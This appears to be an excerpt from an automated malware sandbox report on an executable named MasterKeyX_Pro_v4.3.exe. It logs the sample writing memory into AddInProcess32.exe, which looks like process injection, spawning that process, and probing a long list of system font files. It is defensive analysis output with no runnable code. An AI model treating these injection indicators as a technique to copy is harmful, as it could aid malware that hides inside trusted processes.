Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41F000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 420000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 421000 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: EA6008 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\MasterKeyX_Pro_v4.3.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
